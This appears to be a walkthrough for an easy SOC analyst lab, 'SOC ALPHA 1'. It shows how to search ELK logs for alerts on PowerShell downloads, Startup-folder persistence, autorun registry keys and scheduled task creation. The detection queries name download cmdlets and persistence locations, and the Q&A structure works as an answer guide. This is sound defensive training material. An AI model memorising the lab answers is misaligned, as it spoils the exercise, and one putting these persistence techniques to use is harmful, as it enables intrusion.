search
Guideswhoami

SOC ALPHA 1

Difficulty: Easy

Scenario: You are a SOC analyst and handling the alerts within your SIEM, ELK, is part of daily duties. Answer the following questions by analysing the alerts provided in README.txt!

ELK should start within 5 minutes, if not please try to start the services manually : sudo systemctl start elasticsearch sudo systemctl start kibana sudo systemctl start logstash

Tools: ELK | LogAnalysis | Network Analysis

hashtag
Q1) Alert 1 (1/2) - What is the cmdlet used for downloading?

README.txt shows us that in order to see the logs that triggered the Alert 1 we need to filter for "*.DownloadFile*" OR "*.DownloadString*" OR "*Invoke-WebRequest*" and set the TimeFrame for 14-4-2021 10:00 to 14-4-2021 11:00 :

ELK Search for A1 - Suspicious PowerShell Download

hashtag
Answer

Q&A 1

hashtag
Q2) Alert 1 (2/2) - What is the full URL from which the file is downloaded?

Looking at the same logs as in the first question, we can see the full command containing the URL we are interested in:

ELK Search for A1 - Suspicious PowerShell Download

hashtag
Answer

Q&A 2

hashtag
Q3) Alert 2 (1/1) - What is the name of the suspicious EXE that is added for Persistence?

To see the logs that triggered the Alert 2, we need to filter for (Event_System_EventID :"11" AND Event_EventData_Image : *Windows\\Start*\\Programs\\\Startup*) and set the TimeFrame for 14-4-2021 10:00 to 14-4-2021 11:00:

ELK Search for A2 - Potential Persistance Mechanism - FileCreation

hashtag
Answer

Q&A 3

hashtag
Q4) Alert 3 (1/2) - What is the name of the suspicious executable file involved?

To see the logs that triggered the Alert 3 we need to filter for (Event_System_EventID:("12" OR "13" OR "14") AND (Event_EventData_TargetObject:("*\SOFTWARE\Wow6432Node\Microsoft\ActiveSetup\InstalledComponents*" OR "\SOFTWARE\Microsoft\WindowsCE*Services\AutoStartOnDisconnect*" OR "\SOFTWARE\Microsoft\WindowsCEServices\AutoStartOnConnect" OR "\SYSTEM\Setup\CmdLine" OR "\Software\Microsoft\Ctf\LangBarAddin*" OR "*\Software\Microsoft\CommandProcessor\Autorun" OR "\Run"))) and set the TimeFrame for 15-4-2021 8:00 to 15-4-2021 9:00 . Sysmon Event ID 13 records the registry value modifications. Within the Event_EventData_TargetObject field, at the very end we can see the suspicious executable:

ELK Search for A3 - Autorun Keys Modification

hashtag
Answer

Q&A 4

hashtag
Q5) Alert 3 (2/2) - What is the name of the key path?

Looking at the same log as in Q4, we can find the key path in the same field (Event_EventData_TargetObject). However the answer to the question is not the full path, only the key itself:

ELK Search for A3 - Autorun Keys Modification

hashtag
Answer

Q&A 5

hashtag
Q6) Alert 4 (1/2) - What is the name of the task?

To see the log that triggered the Alert 3 we need to filter for Event_EventData_Image:schtasks.exe AND Event_EventData_CommandLine:Create and set the TimeFrame for 20-4-2021 10:00 to 20-4-2021 15:00. In the log we can see that "SchTasks" command has been run. The name of the task is what's coming after the "/TN" (task name):

ELK Search for A4 - Suspicious Task Creation

hashtag
Answer

Q&A 6

hashtag
Q7) Alert 4 (2/2) - What is the full path of the program?

Looking at the same log as in Q6, we can find the full path of the program following the "/TR" (task run) parameter:

ELK Search for A4 - Suspicious Task Creation

hashtag
Answer

Q&A 7
PreviousInvestigationsNextSOC ALPHA 2